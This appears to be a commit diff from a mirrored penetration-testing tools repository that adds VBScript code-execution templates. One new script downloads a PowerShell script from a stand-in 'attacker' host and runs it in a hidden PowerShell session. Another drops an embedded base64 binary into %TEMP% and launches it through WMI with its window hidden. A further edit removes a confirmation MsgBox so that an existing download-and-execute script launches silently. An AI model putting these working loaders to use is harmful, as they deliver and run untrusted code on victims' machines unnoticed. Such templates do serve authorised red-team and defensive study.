mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-21 10:01:38 +01:00
Added code-exec-templates and some additions to rogue-dot-net
This commit is contained in:
parent
b7c7da7b4e
commit
8b03b5ba40
@ -15,6 +15,10 @@ Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets usin
|
||||
|
||||
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
||||
|
||||
- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
|
||||
|
||||
- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
|
||||
|
||||
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
||||
|
||||
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
||||
|
@ -29,9 +29,7 @@ If xhr.Status = 200 Then
|
||||
|
||||
' STEP 3: Execute file
|
||||
cmd = out & " " & parameters
|
||||
MsgBox cmd
|
||||
sh.Run cmd, 0, False
|
||||
|
||||
End If
|
||||
|
||||
Set sh = Nothing
|
||||
|
@ -0,0 +1,34 @@
|
||||
'
|
||||
' Example of downloading a binary file from the URL, saving it to the
|
||||
' local filesystem and then launching.
|
||||
'
|
||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||
' (https://github.com/mgeeky)
|
||||
'
|
||||
|
||||
scriptURL = "http://attacker/script.ps1"
|
||||
launcher = "powershell -nop -w hid -Command -"
|
||||
|
||||
Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
|
||||
xhr.Open "GET", scriptURL, False
|
||||
xhr.Send
|
||||
|
||||
Function bin2a(Binary)
|
||||
Dim I,S
|
||||
For I = 1 to LenB(Binary)
|
||||
S = S & Chr(AscB(MidB(Binary,I,1)))
|
||||
Next
|
||||
bin2a = S
|
||||
End Function
|
||||
|
||||
If xhr.Status = 200 Then
|
||||
With CreateObject("WScript.Shell")
|
||||
With .Exec(launcher)
|
||||
.StdIn.WriteLine bin2a(xhr.responseBody)
|
||||
.StdIn.WriteBlankLines 1
|
||||
.Terminate
|
||||
End With
|
||||
End With
|
||||
End If
|
||||
|
||||
Set xhr = Nothing
|
@ -0,0 +1,47 @@
|
||||
'
|
||||
' Example of dropping an embedded, base64 encoded binary file to the disk,
|
||||
' decoding it and then launching.
|
||||
'
|
||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||
' (https://github.com/mgeeky)
|
||||
'
|
||||
|
||||
saveFileAs = "%TEMP%\foo.exe"
|
||||
launchParameters = ""
|
||||
|
||||
' =============================================================
|
||||
|
||||
fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
|
||||
|
||||
' =============================================================
|
||||
|
||||
Function Base64Decode(ByVal vCode)
|
||||
Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
|
||||
oNode.dataType = "bin.base64"
|
||||
oNode.text = vCode
|
||||
Base64Decode = oNode.nodeTypedValue
|
||||
Set oNode = Nothing
|
||||
End Function
|
||||
|
||||
Dim sh: Set sh = CreateObject("WScript.Shell")
|
||||
out = sh.ExpandEnvironmentStrings(saveFileAs)
|
||||
|
||||
With CreateObject("Adodb.Stream")
|
||||
.Open
|
||||
.Type = 1
|
||||
.write Base64Decode(fileBuffer)
|
||||
.savetofile out, 2
|
||||
End With
|
||||
|
||||
computer = "."
|
||||
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
|
||||
& computer & "\root\cimv2")
|
||||
|
||||
Set startup = wmi.Get("Win32_ProcessStartup")
|
||||
Set conf = startup.SpawnInstance_
|
||||
conf.ShowWindow = 12
|
||||
|
||||
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
|
||||
|
||||
command = out & " " & launchParameters
|
||||
proc.Create command, Null, conf, intProcessID
|
Loading…
Reference in New Issue
Block a user